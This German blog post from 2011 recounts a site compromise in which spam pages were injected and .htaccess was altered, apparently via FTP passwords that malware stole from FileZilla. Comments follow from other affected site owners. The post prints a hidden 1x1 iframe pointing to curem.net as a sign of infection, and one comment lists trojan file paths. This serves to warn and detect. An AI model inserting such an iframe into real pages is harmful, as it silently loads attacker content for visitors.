Test

Mr. Crowley Blog gehackt!

Die Überschrift sagt ja schon alles. Ja, das Mr. Crowley Blog wurde gehackt. Die Täter sind wahrscheinlich Spammer und der Schaden ist riesig.

Heute haben wir uns gewundert, dass keine Besucher über google.de kamen. Dabei generieren wir über 90% unserer Seitenbesucher über Google. Zu erst hielten wir dies für ein Fehler unseres Statistik Tools. Doch dann fiel uns auf, dass wir bei keinen einzigen Keyword mehr bei Google zu finden sind. Und wir reden hier nicht von ein paar Keywords. Also sind wir der Sache auf den Grund gegangen. Und haben das hier bemerkt:Google Spam

Im Google Index befinden sich ca. 2.000 Seiten, die durch ein Spam-Skript erstellt wurden. Das Skript wurde auf unseren Server geladen. Zusätzlich wurde unsere .htaccess Datei so manipuliert, dass die Spam-Links weitergeleitet wurden. Normalerweile wären die im Screenshot zu sehenden Links nämlich fehlerhaft. Unser Server hätte einen sogenannten 404-Fehler (Seite nicht gefunden) zurückgeworfen und Google hätte die Seiten niemals indiziert. Und um noch einen draufzusetzen wurden alle automatisch generierten Seiten von unseriösen Websites angelinkt. Dahinter steckt also ein klares System. Erst automatisch tausende Seiten generieren und diese von Spam-Websites anlinken.

Jetzt werden einige vielleicht fragen: „Okay und was ist jetzt so schlimm daran, dass plötzlich 2.000 mehr sinnlose Seiten im Google Index sind? Google muss dies als Betrug gewertet haben. Entweder, die vielen sinnlosen Seiten oder die ganzen Spamlinks, die jetzt auf Mr. Crowley verweisen. Google hat uns quasi für alle Suchanfragen soweit heruntergestuft, dass wir jetzt gar nicht mehr gefunden werden. Gestern hatten wir noch mehrere hundert Besucher über Google, heute NULL!

Und wo lag die Sicherheitslücke?

Auch das können wir 100% sagen. Nicht bei unserer Blog Software, sondern bei Filezilla! Dem Freeware FTP Client. Nein, das ist keine Verschwörungstheorie. Ein Crowley Redakteur hatte das FTP Passwort in Filezilla gespeichert. Ebenso wie die FTP Passwörter von 5 anderen Websites. Und jetzt der Clou: Alle 5 Websites, die auf verschiedenen Servern, bei verschiedenen Webhostern liegen, sind infiziert. Schuld daran ist eine Schadsoftware, welche die Daten aus Filezilla ausgespäht hat. Die Passwörter sind in Filezilla nämlich nicht sicher gespeichert. Leider wurde die Schadsoftware nicht von AntiVir erkannt. Erst Anti-Malware konnte die Schadsoftware finden und unschädlich machen.

Also bitte: Speichert keine FTP Passwörter in Filezilla. Passwörter gehören immer verschlüsselt gespeichert!

Wie erkennt ihr, ob eure Website von den gleichen Übeltätern gehackt wurde?

Achte auf eurer Startseite auf folgendes Codesnippet, dass im Quellcode in der letzten Zeile steht:

<iframe heigth=“1″ width=“1″ frameborder=“0″ src=“http://curem.net/t.php?id=[Hier steht eine individuelle ID]“></iframe>

Wenn ihr so ein Codesnippet findet, ist eure Website aller Wahrscheinlichkeit nach infiziert. Falls jemand das Problem hat, schreibt uns gerne an. Wir zeigen euch in 4 Schritten, wie ihr den Mist ein für alle mal los werdet.

Fazit für das Mr. Crowley Blog

Ja Leute, wir sind am Ar… Wir können nur hoffen, dass Google uns nur temporär abstraft. Wir haben alle nötigen Gegenmaßnahmen unternommen. Aber bis die wirken (wenn sie wirken) kann es einige Monate dauern.

Update!!!

Nachdem wir sämtliche Gegenmaßnahmen unternommen haben, sind wir seit heute sogar bei einigen Keywords wieder zu finden. Insgesamt wurden 8.000 Spamwebseiten auf unseren Server eingeschleust. Wir haben sämtliche Seiten gelöscht, Schadhaften Code bereinigt und bei Google einen Antrag zur Neubewertung der Website gestellt.

Preisvergleich

Nutzen Sie unseren Preisvergleich, um "" günstig zu kaufen. Die Preise beziehen sich auf ausgewählte Onlineshops.

Keine EAN oder ASIN vergeben

Hat dir der Testbericht geholfen?

Hat dir unser "" Test weit geholfen? Dann gib bitte eine Bewertung ab.

1 Stern2 Sterne3 Sterne4 Sterne5 Sterne (Bisher keine Bewertung)
Loading...

7 Gedanken zu „Mr. Crowley Blog gehackt!

  • 10. März 2011 um 11:02
    Permalink

    hey.
    ich habe/hatte das gleiche problem.
    bei mehreren seiten musste ich mich mit diesem problem rumschlagen.
    meinst du wirklich, dass es an filezilla liegt?
    würde mich freuen, wenn wir uns austauschen könnten.

    Antwort
    • 10. März 2011 um 12:32
      Permalink

      Hallo Jeichi,

      ich bin mir 200% sicher, dass die Passwörter bei mir und 2 anderen Kollegen durch die nachfolgenden Trojaner die Filezilla Passwörter ausgespäht haben. Lass uns gerne mal heute Abend oder morgen chatten / telefonieren / mailen (was dir lieber ist).

      Viele Grüße

      Hier sind die Trojaner zusammengefasst, die auf den infizierten Rechnern waren:

      c:\Users\AppData\Local\microsoft\Windows\temporary internet files\Content.IE5\HTD7DIC2\yhb08f27f4v0100f035002r5b5a538b108tfdb9d56fq00000000900801f0016000aj0e000601l00073290[1] (Trojan.Downloader)
      c:\Users\AppData\Local\Temp\_4050.tmp (Trojan.FakeAV) c:\Users\AppData\Local\Temp\_A440.tmp (Trojan.FakeAV) c:\Users\AppData\Local\Temp\_BBC6.tmp (Trojan.FakeAV) c:\Users\AppData\Local\Temp\msitcm.cpl (Trojan.Downloader)
      c:\Users\AppData\Local\Temp\wIgn.exe (Trojan.Downloader) c:\Windows\System32\dll.dll (Trojan.Lukicsel)
      c:\Windows\System32\cryptnet32.dll (Trojan.Tracur)

      Antwort
  • 6. Mai 2011 um 16:48
    Permalink

    Hallo,
    ich habe das gleiche Problem. Bei mir im Blog habe ich jetzt auch überall diese iframes und ich nutze leider auch Filezilla. Wie kann ich das Problem beheben?
    Würde mich riesig über eine Antwort freuen.
    Viele Grüße

    Antwort
  • 6. Mai 2011 um 17:06
    Permalink

    Hallo Thomas,

    dieses blöde curem.net Gedöns hat deine Seite voll erwischt. Ich habe dir gerade eine Mail mit Gegenmaßnahmen gesendet.

    Viele Grüße

    Das Crowley Blog

    Antwort
  • 8. Mai 2011 um 13:28
    Permalink

    Hallo,
    bitte um Hilfe.
    Wie entfernt man in 4 Schritten das oben genannte Codesnippet.

    Gruß
    harry602

    Antwort
  • 10. Mai 2011 um 08:29
    Permalink

    Hallo,
    habe mir auch den curem eingefangen, die seite wurde jetzt von strato gesperrt. Seid ihr sicher das es von filezilla kommt?
    Über eine Gegenmaßnahmenmail würde ich mich sehr freuen :).

    Gehackte Grüße

    Nik

    Antwort
  • 10. Mai 2011 um 09:46
    Permalink

    Hallo Harry & Nik,

    ich habe euch beiden wegen curem.net eben schon angeschrieben. Bitte nennt mir die Seiten, um die es geht. Dann können wir individuell schauen, wie wir das Ding entfernen.

    Viele Grüße

    Crowley

    Antwort

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*